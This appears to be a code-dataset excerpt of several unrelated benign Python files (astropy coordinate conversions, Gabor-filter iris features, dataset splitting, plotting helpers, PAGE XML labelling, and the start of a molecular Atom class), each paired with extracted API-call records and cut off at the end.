'()\n', (1129, 1131), False, 'import datetime\n')]
|
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import math
test_scores=[88,92,79,93,85]
print(np.mean(test_scores))
curved_5=[score + 5 for score in test_scores]
print(np.mean(curved_5))
curved_10=[score + 10 for score in test_scores]
print(np.mean(curved_10))
curved_sqrt=[math.sqrt(score)*10 for score in test_scores]
print(np.mean(curved_sqrt))
# # Used list comprehensions to make it more concise and readable,more descriptive names for resulting lists and variables,used numpy for mean calculation
# # Still curved_5 and curved_10 have same code logic ,we can generalise it into function. Code can be refactored.
|
[
"numpy.mean",
"math.sqrt"
] |
[((110, 130), 'numpy.mean', 'np.mean', (['test_scores'], {}), '(test_scores)\n', (117, 130), True, 'import numpy as np\n'), ((188, 205), 'numpy.mean', 'np.mean', (['curved_5'], {}), '(curved_5)\n', (195, 205), True, 'import numpy as np\n'), ((265, 283), 'numpy.mean', 'np.mean', (['curved_10'], {}), '(curved_10)\n', (272, 283), True, 'import numpy as np\n'), ((354, 374), 'numpy.mean', 'np.mean', (['curved_sqrt'], {}), '(curved_sqrt)\n', (361, 374), True, 'import numpy as np\n'), ((301, 317), 'math.sqrt', 'math.sqrt', (['score'], {}), '(score)\n', (310, 317), False, 'import math\n')]
|
#eci_ecef_conversions.py
#<NAME> (nhz2)
#November 24, 2019
# using examples from https://astropy.readthedocs.io/en/latest/coordinates/velocities.html
"""Module for using astropy to convert between ECI and ECEF coordinates and velocities"""
import astropy.units as u
from astropy.coordinates import (ITRS,GCRS)
from astropy.coordinates import (CartesianRepresentation,CartesianDifferential)
from astropy.time import Time
import numpy as np
def time2astropyTime(time,init_gps_weeknum):
"""
args:
time(double): time since init_GPS_week_number in seconds
init_gps_weeknum(int): initial GPS week number."""
return Time(init_gps_weeknum*7*24*60*60, time, scale='tai', format='gps')
def ecef2eci_mc_runs(times, mc_runs, init_gps_weeknum):
'''
Times and mc_runs have the same length.
args:
mc_runs, a list of all mc_runs, each of which is a list of positions across the duration of the run
times, a list of times, measured in seconds since the pan_epoch
init_gps_weeknum, the GPS week number of the pan epoch
returns:
a list of all the mc_runs, each of which is a list of positions in ECI
'''
num_times = len(times)
list_of_mc_snapshots = np.array(mc_runs).transpose((1,0,2))
list_of_mc_snapshots_eci = np.array([ecef2eci_same_time_batch(times[idx], list_of_mc_snapshots[idx], init_gps_weeknum) for idx in range(num_times)])
return list_of_mc_snapshots_eci
def get_covariances(mc_snapshots_eci):
'''Return a list of the covariances of the position vectors in ECI
args:
a list over mc runs, then over time of the position vectors
returns:
a list of 3 x 3 matricies over time'''
return np.array([np.cov(x.T) for x in mc_snapshots_eci])
def ecef2eci_same_time_batch(time, vectors, init_gps_weeknum):
'''Converts a batch of position vectors at the same time into the ECI coordinate frame
args:
vectors: a list of 3-element numpy arrays, each representing a position vector in ECEF
time: a single time in seconds since the pan epoch
init_gps_weeknum: the pan epoch
returns:
a list of 3-element numpy arrays representing the position in ECI coordinates, as a 2d numpy matrix
'''
vectors_transposed = np.array(vectors).T
return ecef2eci(time, vectors_transposed, vectors_transposed, init_gps_weeknum)[0].T
def ecef2eci(time,r_ecef,v_ecef,init_gps_weeknum):
"""Returns a tuple of position and velocity in ECI"""
coord_ecef=ITRS(x=r_ecef[0]*u.m, y=r_ecef[1]*u.m, z=r_ecef[2]*u.m,
v_x=v_ecef[0]*u.m/u.s, v_y=v_ecef[1]*u.m/u.s, v_z=v_ecef[2]*u.m/u.s,
representation_type=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=time2astropyTime(time,init_gps_weeknum))
coord_eci= coord_ecef.transform_to(GCRS(obstime=time2astropyTime(time,init_gps_weeknum)))
return (coord_eci.cartesian.xyz.to_value(u.m),coord_eci.velocity.d_xyz.to_value(u.m/u.s))
def eci2ecef(time,r_eci,v_eci,init_gps_weeknum):
"""Returns a tuple of position and velocity in ECEF"""
coord_eci=GCRS(x=r_eci[0]*u.m, y=r_eci[1]*u.m, z=r_eci[2]*u.m,
v_x=v_eci[0]*u.m/u.s, v_y=v_eci[1]*u.m/u.s, v_z=v_eci[2]*u.m/u.s,
representation_type=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=time2astropyTime(time,init_gps_weeknum))
coord_ecef= coord_eci.transform_to(ITRS(obstime=time2astropyTime(time,init_gps_weeknum)))
return (coord_ecef.cartesian.xyz.to_value(u.m),coord_ecef.velocity.d_xyz.to_value(u.m/u.s))
if __name__ == '__main__':
xs = [[0,0,3],[1,0,0],[0,1,0],[0,0,1],[1,1,1]]
xss = [ [[1,2,3],[4,5,6], [4,5,6]], [[4,2,3],[4,5,6],[5,15,16]], [[1,2,3],[4,5,6], [40,15,60]] ]
def copy_xs():
return [[y for y in x] for x in xs]
mc_runs = [xss[0], xss[1], xss[2]]
times = [1,2,3]
converted_mc_runs = ecef2eci_mc_runs(times, mc_runs, 2045)
covariances = get_covariances(converted_mc_runs)
# print(converted_mc_runs.shape)
# print(converted_mc_runs)
print(covariances.shape)
print(covariances)
# print(covariances)
|
[
"astropy.time.Time",
"numpy.cov",
"numpy.array"
] |
[((638, 712), 'astropy.time.Time', 'Time', (['(init_gps_weeknum * 7 * 24 * 60 * 60)', 'time'], {'scale': '"""tai"""', 'format': '"""gps"""'}), "(init_gps_weeknum * 7 * 24 * 60 * 60, time, scale='tai', format='gps')\n", (642, 712), False, 'from astropy.time import Time\n'), ((2277, 2294), 'numpy.array', 'np.array', (['vectors'], {}), '(vectors)\n', (2285, 2294), True, 'import numpy as np\n'), ((1222, 1239), 'numpy.array', 'np.array', (['mc_runs'], {}), '(mc_runs)\n', (1230, 1239), True, 'import numpy as np\n'), ((1719, 1730), 'numpy.cov', 'np.cov', (['x.T'], {}), '(x.T)\n', (1725, 1730), True, 'import numpy as np\n')]
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: <NAME>
@Date: 2018-08-10 19:31:47
"""
from __future__ import absolute_import, division, print_function
import csv
import os
import numpy as np
np.random.seed(0)
ratio = 0.9
def gen_lines(path, d):
path = os.path.join(path, d)
lines = []
for f in os.listdir(path):
if f.endswith('.jpg'):
lines.append([os.path.join(path, f), d])
return lines
path = 'data'
dirs = sorted(os.listdir(path))
all_lines = []
for d in dirs:
all_lines.append(gen_lines(path, d))
class_count = {}
len_sum = 0
for lines in all_lines:
print('{} -> {}'.format(lines[0][1], len(lines)))
class_count[lines[0][1]] = len(lines)
len_sum += len(lines)
len_avg = int(len_sum/len(all_lines))
cc = sorted(class_count, key=class_count.get, reverse=True)
with open('class_count.txt', 'w') as f:
for c in cc:
f.write('{} {}\n'.format(c, class_count[c]))
train_lines = []
valid_lines = []
for lines in all_lines:
np.random.shuffle(lines)
cut = int(len(lines)*ratio)
train_lines += lines[:cut]
valid_lines += lines[cut:]
np.random.shuffle(train_lines)
np.random.shuffle(valid_lines)
with open('train.csv', 'wb') as f:
cw = csv.writer(f)
for line in train_lines:
cw.writerow(line)
with open('valid.csv', 'wb') as f:
cw = csv.writer(f)
for line in valid_lines:
cw.writerow(line)
|
[
"numpy.random.seed",
"csv.writer",
"os.path.join",
"os.listdir",
"numpy.random.shuffle"
] |
[((212, 229), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (226, 229), True, 'import numpy as np\n'), ((1097, 1127), 'numpy.random.shuffle', 'np.random.shuffle', (['train_lines'], {}), '(train_lines)\n', (1114, 1127), True, 'import numpy as np\n'), ((1128, 1158), 'numpy.random.shuffle', 'np.random.shuffle', (['valid_lines'], {}), '(valid_lines)\n', (1145, 1158), True, 'import numpy as np\n'), ((277, 298), 'os.path.join', 'os.path.join', (['path', 'd'], {}), '(path, d)\n', (289, 298), False, 'import os\n'), ((323, 339), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (333, 339), False, 'import os\n'), ((460, 476), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (470, 476), False, 'import os\n'), ((983, 1007), 'numpy.random.shuffle', 'np.random.shuffle', (['lines'], {}), '(lines)\n', (1000, 1007), True, 'import numpy as np\n'), ((1202, 1215), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1212, 1215), False, 'import csv\n'), ((1308, 1321), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1318, 1321), False, 'import csv\n'), ((388, 409), 'os.path.join', 'os.path.join', (['path', 'f'], {}), '(path, f)\n', (400, 409), False, 'import os\n')]
|
import cv2
import numpy as np
import glob
import math
import scipy
from scipy.spatial import distance
from scipy import signal
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
#modulating function as defined in paper
def m(x ,y, f):
val = np.cos(2*np.pi*f*math.sqrt(x **2 + y**2))
return val
#spatial filter as defined in paper
def gabor(x, y, dx, dy, f):
gb = (1/(2*math.pi*dx*dy))*np.exp(-0.5*(x**2 / dx**2 + y**2 / dy**2)) * m(x, y, f)
return gb
#function to calculate spatial filter over 8x8 blocks
def spatial(f,dx,dy):
sfilter=np.zeros((8,8))
for i in range(8):
for j in range(8):
sfilter[i,j]=gabor((-4+j),(-4+i),dx,dy,f)
return sfilter
def get_vec(convolvedtrain1,convolvedtrain2):
feature_vec=[]
for i in range(6):
for j in range(64):
#Run 8 by 8 filtered block iteratively over the entire image
start_height = i*8
end_height = start_height+8
start_wid = j*8
end_wid = start_wid+8
grid1 = convolvedtrain1[start_height:end_height, start_wid:end_wid]
grid2 = convolvedtrain2[start_height:end_height, start_wid:end_wid]
# Channel 1
absolute = np.absolute(grid1)
# mean
mean = np.mean(absolute)
feature_vec.append(mean)
#deviation
std = np.mean(np.absolute(absolute-mean))
feature_vec.append(std)
# Channel 2
absolute = np.absolute(grid2)
# mean
mean = np.mean(absolute)
feature_vec.append(mean)
#deviation
std = np.mean(np.absolute(absolute-mean))
feature_vec.append(std)
return feature_vec
def FeatureExtraction(enhanced):
con1=[]
con2=[]
#get spatial filters
filter1=spatial(0.67,3,1.5)
filter2=spatial(0.67,4,1.5)
feature_vector=[]
for i in range(len(enhanced)):
img=enhanced[i]
#define a 48x512 region over which the filters are applied
img_roi=img[:48,:]
filtered1=scipy.signal.convolve2d(img_roi,filter1,mode='same')
filtered2=scipy.signal.convolve2d(img_roi,filter2,mode='same')
con1.append(filtered1)
con2.append(filtered2)
fv=get_vec(filtered1,filtered2)
feature_vector.append(fv)
return feature_vector #each feature vector has a dimension of 1536
|
[
"numpy.absolute",
"math.sqrt",
"scipy.signal.convolve2d",
"numpy.zeros",
"numpy.mean",
"numpy.exp"
] |
[((663, 679), 'numpy.zeros', 'np.zeros', (['(8, 8)'], {}), '((8, 8))\n', (671, 679), True, 'import numpy as np\n'), ((2311, 2365), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter1'], {'mode': '"""same"""'}), "(img_roi, filter1, mode='same')\n", (2334, 2365), False, 'import scipy\n'), ((2382, 2436), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter2'], {'mode': '"""same"""'}), "(img_roi, filter2, mode='same')\n", (2405, 2436), False, 'import scipy\n'), ((369, 395), 'math.sqrt', 'math.sqrt', (['(x ** 2 + y ** 2)'], {}), '(x ** 2 + y ** 2)\n', (378, 395), False, 'import math\n'), ((504, 556), 'numpy.exp', 'np.exp', (['(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))'], {}), '(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))\n', (510, 556), True, 'import numpy as np\n'), ((1373, 1391), 'numpy.absolute', 'np.absolute', (['grid1'], {}), '(grid1)\n', (1384, 1391), True, 'import numpy as np\n'), ((1438, 1455), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1445, 1455), True, 'import numpy as np\n'), ((1678, 1696), 'numpy.absolute', 'np.absolute', (['grid2'], {}), '(grid2)\n', (1689, 1696), True, 'import numpy as np\n'), ((1743, 1760), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1750, 1760), True, 'import numpy as np\n'), ((1554, 1582), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1565, 1582), True, 'import numpy as np\n'), ((1859, 1887), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1870, 1887), True, 'import numpy as np\n')]
|
#export
import matplotlib
import matplotlib.pyplot as plt
from datetime import datetime
import glob
import emoji
import numpy as np
import seaborn as sns
def convert(year,month,date):
return int(datetime(year, month, date, 0, 0, 0).timestamp()*1000)
def convert_reverse(timestamp):
dt_object = datetime.fromtimestamp(timestamp/1000)
print("dt_object =", dt_object)
return dt_object
def add_extra_timeperiod(plt,window,start_time,end_time):
start_election = convert(2019,4,11)
end_election = convert(2019,5,23)
pulwama_event= convert(2019,2,14)
balakot_event= convert(2019,2,27)
day_start=int((start_election-start_time)/(window*24*60*60*1000))
day_end=int((end_election-start_time)/(window*24*60*60*1000))
plt.axvline(day_start, linestyle='--', color='r')
for i in range(day_start+1,day_end):
plt.axvline(i, linestyle='--',alpha=0.2, color='r')
plt.axvline(day_end, linestyle='--', color='r')
day_pulwama=int((pulwama_event-start_time)/(window*24*60*60*1000))
day_balakot=int((balakot_event-start_time)/(window*24*60*60*1000))
plt.axvline(day_pulwama, linestyle='--',alpha=0.5, color='k',linewidth=1.5)
plt.axvline(day_balakot, linestyle='--',alpha=0.5, color='k',linewidth=1.5)
x_tick_keys=[]
x_tick_label=[]
for year in [2018,2019]:
for month in range(1,13):
if(year==2019 and (month in [3,4,6])):
continue
timestamp_begin_month=convert(year,month,1)
if(timestamp_begin_month>start_time and timestamp_begin_month<end_time):
first_day_month =int((timestamp_begin_month-start_time)/(window*24*60*60*1000))
x_tick_keys.append(first_day_month)
x_tick_label.append(str(month)+'/'+str(year))
#### for pulwama +balakot
x_tick_keys.append(day_pulwama)
x_tick_label.append('pulwama event')
x_tick_keys.append(day_balakot)
x_tick_label.append('balakot event')
x_tick_keys.append(day_start)
x_tick_label.append('election start')
x_tick_keys.append(day_end)
x_tick_label.append('election end')
plt.xticks(x_tick_keys, x_tick_label, rotation=90)
return plt
def emoji_string(ele):
emoji_files=glob.glob("../Political_Results/Emoji/*")
try:
emoji_name="-".join(emoji.demojize(ele)[1:-1].split('_'))
except:
return " "
str1= " "
for emoji_file in emoji_files:
temp=emoji_file.split("/")[3]
emoji_filename = temp.split("_")[0]
if(emoji_filename==emoji_name):
return "\includegraphics[height=1em]{samples/Emoji/"+temp+"}"
print(emoji_name+" not found")
return str1
def latex_emoji_communities(community_dict):
str1="\\begin{table}[!htb]\n\\begin{tabular}{c}\n \hline Emojis \\\\\hline"
for key in community_dict:
for ele in community_dict[key]:
str1+=emoji_string(ele)+","
str1+="\\\\\\hline\n"
str1+="\end{tabular}\n\caption{Co-occuring emojis captured as communities}\n \label{tab:emoji_communities}\n\end{table}"
return str1
def make_confusion_matrix(cf,
group_names=None,
categories='auto',
count=True,
percent=True,
cbar=True,
xyticks=True,
xyplotlabels=True,
sum_stats=True,
figsize=None,
cmap='Blues',
title=None):
'''
This function will make a pretty plot of an sklearn Confusion Matrix cm using a Seaborn heatmap visualization.
Arguments
---------
cf: confusion matrix to be passed in
group_names: List of strings that represent the labels row by row to be shown in each square.
categories: List of strings containing the categories to be displayed on the x,y axis. Default is 'auto'
count: If True, show the raw number in the confusion matrix. Default is True.
normalize: If True, show the proportions for each category. Default is True.
cbar: If True, show the color bar. The cbar values are based off the values in the confusion matrix.
Default is True.
xyticks: If True, show x and y ticks. Default is True.
xyplotlabels: If True, show 'True Label' and 'Predicted Label' on the figure. Default is True.
sum_stats: If True, display summary statistics below the figure. Default is True.
figsize: Tuple representing the figure size. Default will be the matplotlib rcParams value.
cmap: Colormap of the values displayed from matplotlib.pyplot.cm. Default is 'Blues'
See http://matplotlib.org/examples/color/colormaps_reference.html
title: Title for the heatmap. Default is None.
'''
# CODE TO GENERATE TEXT INSIDE EACH SQUARE
blanks = ['' for i in range(cf.size)]
if group_names and len(group_names)==cf.size:
group_labels = ["{}\n".format(value) for value in group_names]
else:
group_labels = blanks
if count:
group_counts = ["{0:0.0f}\n".format(value) for value in cf.flatten()]
else:
group_counts = blanks
if percent:
group_percentages = ["{0:.2%}".format(value) for value in cf.flatten()/np.sum(cf)]
else:
group_percentages = blanks
box_labels = [f"{v1}{v2}{v3}".strip() for v1, v2, v3 in zip(group_labels,group_counts,group_percentages)]
box_labels = np.asarray(box_labels).reshape(cf.shape[0],cf.shape[1])
# CODE TO GENERATE SUMMARY STATISTICS & TEXT FOR SUMMARY STATS
if sum_stats:
#Accuracy is sum of diagonal divided by total observations
accuracy = np.trace(cf) / float(np.sum(cf))
#if it is a binary confusion matrix, show some more stats
if len(cf)==2:
#Metrics for Binary Confusion Matrices
precision = cf[1,1] / sum(cf[:,1])
recall = cf[1,1] / sum(cf[1,:])
f1_score = 2*precision*recall / (precision + recall)
stats_text = "\n\nAccuracy={:0.3f}\nPrecision={:0.3f}\nRecall={:0.3f}\nF1 Score={:0.3f}".format(
accuracy,precision,recall,f1_score)
else:
stats_text = "\n\nAccuracy={:0.3f}".format(accuracy)
else:
stats_text = ""
# SET FIGURE PARAMETERS ACCORDING TO OTHER ARGUMENTS
if figsize==None:
#Get default figure size if not set
figsize = plt.rcParams.get('figure.figsize')
if xyticks==False:
#Do not show categories if xyticks is False
categories=False
# MAKE THE HEATMAP VISUALIZATION
plt.figure(figsize=figsize)
sns.heatmap(cf,annot=box_labels,fmt="",cmap=cmap,cbar=cbar,xticklabels=categories,yticklabels=categories)
if xyplotlabels:
plt.ylabel('True label')
plt.xlabel('Predicted label' + stats_text)
else:
plt.xlabel(stats_text)
if title:
plt.title(title)
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.axvline",
"numpy.trace",
"seaborn.heatmap",
"numpy.sum",
"emoji.demojize",
"datetime.datetime.fromtimestamp",
"numpy.asarray",
"matplotlib.pyplot.rcParams.get",
"datetime.datetime",
"matplotlib.pyplot.figure",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.xlabel"
] |
[((305, 345), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['(timestamp / 1000)'], {}), '(timestamp / 1000)\n', (327, 345), False, 'from datetime import datetime\n'), ((762, 811), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_start'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_start, linestyle='--', color='r')\n", (773, 811), True, 'import matplotlib.pyplot as plt\n'), ((917, 964), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_end'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_end, linestyle='--', color='r')\n", (928, 964), True, 'import matplotlib.pyplot as plt\n'), ((1113, 1190), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_pulwama'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_pulwama, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1124, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1270), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_balakot'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_balakot, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1204, 1270), True, 'import matplotlib.pyplot as plt\n'), ((2143, 2193), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x_tick_keys', 'x_tick_label'], {'rotation': '(90)'}), '(x_tick_keys, x_tick_label, rotation=90)\n', (2153, 2193), True, 'import matplotlib.pyplot as plt\n'), ((2252, 2293), 'glob.glob', 'glob.glob', (['"""../Political_Results/Emoji/*"""'], {}), "('../Political_Results/Emoji/*')\n", (2261, 2293), False, 'import glob\n'), ((6804, 6831), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (6814, 6831), True, 'import matplotlib.pyplot as plt\n'), ((6836, 6952), 'seaborn.heatmap', 'sns.heatmap', (['cf'], {'annot': 'box_labels', 'fmt': '""""""', 'cmap': 'cmap', 'cbar': 'cbar', 'xticklabels': 'categories', 'yticklabels': 'categories'}), "(cf, annot=box_labels, fmt='', cmap=cmap, cbar=cbar, xticklabels\n =categories, yticklabels=categories)\n", (6847, 6952), True, 'import seaborn as sns\n'), ((861, 913), 'matplotlib.pyplot.axvline', 'plt.axvline', (['i'], {'linestyle': '"""--"""', 'alpha': '(0.2)', 'color': '"""r"""'}), "(i, linestyle='--', alpha=0.2, color='r')\n", (872, 913), True, 'import matplotlib.pyplot as plt\n'), ((6625, 6659), 'matplotlib.pyplot.rcParams.get', 'plt.rcParams.get', (['"""figure.figsize"""'], {}), "('figure.figsize')\n", (6641, 6659), True, 'import matplotlib.pyplot as plt\n'), ((6972, 6996), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""True label"""'], {}), "('True label')\n", (6982, 6996), True, 'import matplotlib.pyplot as plt\n'), ((7005, 7047), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (["('Predicted label' + stats_text)"], {}), "('Predicted label' + stats_text)\n", (7015, 7047), True, 'import matplotlib.pyplot as plt\n'), ((7066, 7088), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['stats_text'], {}), '(stats_text)\n', (7076, 7088), True, 'import matplotlib.pyplot as plt\n'), ((7116, 7132), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (7125, 7132), True, 'import matplotlib.pyplot as plt\n'), ((5644, 5666), 'numpy.asarray', 'np.asarray', (['box_labels'], {}), '(box_labels)\n', (5654, 5666), True, 'import numpy as np\n'), ((5874, 5886), 'numpy.trace', 'np.trace', (['cf'], {}), '(cf)\n', (5882, 5886), True, 'import numpy as np\n'), ((5895, 5905), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5901, 5905), True, 'import numpy as np\n'), ((201, 237), 'datetime.datetime', 'datetime', (['year', 'month', 'date', '(0)', '(0)', '(0)'], {}), '(year, month, date, 0, 0, 0)\n', (209, 237), False, 'from datetime import datetime\n'), ((5459, 5469), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5465, 5469), True, 'import numpy as np\n'), ((2331, 2350), 'emoji.demojize', 'emoji.demojize', (['ele'], {}), '(ele)\n', (2345, 2350), False, 'import emoji\n')]
|
import os
import cv2
import numpy as np
import lxml.etree as ET
page_folder='moc_dataset/train/moc_train_xml/'
image_folder='moc_dataset/train/moc_train_images/'
pixel_label_folder='moc_dataset/train/moc_train_pixel_label/'
os.mkdir(pixel_label_folder)
for page_file in sorted(os.listdir(page_folder)):
print(page_file)
img=cv2.imread(image_folder+page_file[:-4]+'.png',0)
img=255-img
tree=ET.parse(page_folder+page_file)
root=tree.getroot()
page=root[1]
width=int(page.attrib.get('imageWidth'))
height=int(page.attrib.get('imageHeight'))
pixel_label_img=np.zeros((height,width))
pixel_label=5
text_region=page[1]
number_of_textlines=(len(text_region))
for i in range(1,number_of_textlines-1):
textline=text_region[i]
points=textline[0].attrib.get('points').split(" ")
number_of_vertices=len(points)
vertices_list=[]
for j in range(number_of_vertices):
x=int(points[j].split(",")[0])
y=int(points[j].split(",")[1])
vertices_list.append([x,y])
vertices_array=np.array([vertices_list],dtype=np.int32)
line_mask=np.zeros((height,width))
line_mask=cv2.fillPoly(line_mask,vertices_array,1)
line_text=img*line_mask
pixel_label_img[line_text==255]=pixel_label
pixel_label=pixel_label+1
cv2.imwrite(pixel_label_folder+page_file[:-4]+'.png',pixel_label_img)
|
[
"os.mkdir",
"cv2.imwrite",
"numpy.zeros",
"cv2.fillPoly",
"cv2.imread",
"numpy.array",
"lxml.etree.parse",
"os.listdir"
] |
[((225, 253), 'os.mkdir', 'os.mkdir', (['pixel_label_folder'], {}), '(pixel_label_folder)\n', (233, 253), False, 'import os\n'), ((279, 302), 'os.listdir', 'os.listdir', (['page_folder'], {}), '(page_folder)\n', (289, 302), False, 'import os\n'), ((334, 387), 'cv2.imread', 'cv2.imread', (["(image_folder + page_file[:-4] + '.png')", '(0)'], {}), "(image_folder + page_file[:-4] + '.png', 0)\n", (344, 387), False, 'import cv2\n'), ((408, 441), 'lxml.etree.parse', 'ET.parse', (['(page_folder + page_file)'], {}), '(page_folder + page_file)\n', (416, 441), True, 'import lxml.etree as ET\n'), ((593, 618), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (601, 618), True, 'import numpy as np\n'), ((1361, 1435), 'cv2.imwrite', 'cv2.imwrite', (["(pixel_label_folder + page_file[:-4] + '.png')", 'pixel_label_img'], {}), "(pixel_label_folder + page_file[:-4] + '.png', pixel_label_img)\n", (1372, 1435), False, 'import cv2\n'), ((1096, 1137), 'numpy.array', 'np.array', (['[vertices_list]'], {'dtype': 'np.int32'}), '([vertices_list], dtype=np.int32)\n', (1104, 1137), True, 'import numpy as np\n'), ((1155, 1180), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (1163, 1180), True, 'import numpy as np\n'), ((1198, 1240), 'cv2.fillPoly', 'cv2.fillPoly', (['line_mask', 'vertices_array', '(1)'], {}), '(line_mask, vertices_array, 1)\n', (1210, 1240), False, 'import cv2\n')]
|
from __future__ import unicode_literals
import copy
import heapq
import math
import numpy
import os
import types
import uuid
from .common import log
from .errors import MoleculeError, PTError, FileError
from .settings import Settings
from ..tools.pdbtools import PDBHandler, PDBRecord
from ..tools.utils import Units, PT
__all__ = ['Atom', 'Bond', 'Molecule']
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Atom(object):
"""A class representing a single atom in three dimensional space.
An instance of this class has the following attributes:
* ``atnum`` -- atomic number (zero for "dummy atoms")
* ``coords`` -- tuple of length 3 storing spatial coordinates
* ``bonds`` -- list of bonds (see |Bond|) this atom is a part of
* ``mol`` -- a |Molecule| this atom belongs to
* ``properties`` -- a |Settings| instance storing all other information about this atom (initially it is populated with *\*\*other* keyword arguments passed to the constructor)
All the above attributes can be accessed either directly or using one of the following properties:
* ``x``, ``y``, ``z`` -- allow to read or modify each coordinate separately
* ``symbol`` -- allows to read or write atomic symbol directly. Atomic symbol is not stored as an attribute, instead of that atomic number (``atnum``) indicates the type of atom. In fact, ``symbol`` this is just a wrapper around ``atnum`` that uses |PeriodicTable| as a translator::
>>> a = Atom(atnum=8)
>>> print a.symbol
O
>>> a.symbol = 'Ca'
>>> print a.atnum
20
* ``mass`` -- atomic mass, obtained from |PeriodicTable|, read only
* ``radius`` -- atomic radius, obtained from |PeriodicTable|, read only
* ``connectors`` -- number of connectors, obtained from |PeriodicTable|, read only
.. note::
When creating a new atom, its type can be chosen either by setting an atomic number or a symbol (``atnum`` and ``symbol`` constructor arguments). Symbol takes precedence -- if it is supplied, ``atnum`` argument is ignored.
Values stored in ``coords`` tuple do not necessarily have to be numeric, you can also store any string there. This might come handy for programs that allow parametrization of coordinates in the input file (to enforce some geometry constraints for example)::
>>> a = Atom(symbol='C', coords=(1,2,3))
>>> print a
C 1.00000 2.00000 3.00000
>>> a.y = 'param1'
>>> print a
C 1.00000 param1 3.00000
However, non-numerical coordinates cannot be used together with some methods (for example :meth:`distance_to` or :meth:`translate`). Trying to do this will raise an exception.
Internally, atomic coordinates are always expressed in angstroms. Most of methods that read or modify atomic coordinates accept keyword argument ``unit`` allowing to choose unit in which results and/or arguments are expressed (see |Units| for details). Throughout the entire code angstrom is the default length unit. If you don't specify ``unit`` parameter in any place of your script, all automatic unit handling described above boils down to occasional multiplication/division by 1.0.
"""
def __init__(self, atnum=0, symbol=None, coords=None, unit='angstrom', bonds=None, mol=None, **other):
if symbol is not None:
self.symbol = symbol
else:
self.atnum = atnum
self.mol = mol
self.bonds = bonds or []
self.properties = Settings(other)
if coords is None:
self.coords = (0.0, 0.0, 0.0)
elif len(coords) == 3:
tmp = []
for i in coords:
try:
i = Units.convert(float(i), unit, 'angstrom')
except ValueError: pass
tmp.append(i)
self.coords = tuple(tmp)
else:
raise TypeError('Atom: Invalid coordinates passed')
def str(self, symbol=True, suffix='', unit='angstrom', space=14, decimal=6):
"""Return a string representation of this atom.
Returned string is a single line (no newline characters) that always contains atomic coordinates (and maybe more). Each atomic coordinate is printed using *space* characters, with *decimal* characters reserved for decimal digits. Coordinates values are expressed in *unit*.
If *symbol* is ``True``, atomic symbol is added at the beginning of the line. If *symbol* is a string, this exact string is printed there.
*suffix* is an arbitrary string that is appended at the end of returned line. It can contain identifiers in curly brackets (like for example ``f={fragment}``) that will be replaced by values of corresponding attributes (in this case ``self.fragment``). It is done via new string formatting and entire ``self.__dict__`` is passed to formating method. See :ref:`new-string-formatting` for details.
Example:
>>> a = Atom(atnum=6, coords=(1,1.5,2))
>>> print a.str()
C 1.000000 1.500000 2.000000
>>> print a.str(unit='bohr')
C 1.889726 2.834589 3.779452
>>> print a.str(symbol=False)
1.000000 1.500000 2.000000
>>> print a.str(symbol='C2.13')
C2.13 1.000000 1.500000 2.000000
>>> print a.str(suffix='protein1')
C 1.000000 1.500000 2.000000 protein1
>>> a.info = 'membrane'
>>> print a.str(suffix='subsystem={info}')
C 1.000000 1.500000 2.000000 subsystem=membrane
"""
strformat = '{:>%is}'%space
numformat = '{:>%i.%if}'%(space,decimal)
f = lambda x: numformat.format(Units.convert(x, 'angstrom', unit)) if isinstance(x, (int,float)) else strformat.format(str(x))
if symbol is False:
return ('{0}{1}{2} '+suffix).format(*map(f,self.coords), **self.__dict__)
if symbol is True:
symbol = self.symbol
return ('{0:>10s}{1}{2}{3} '+suffix).format(symbol, *map(f,self.coords), **self.__dict__)
def __str__(self):
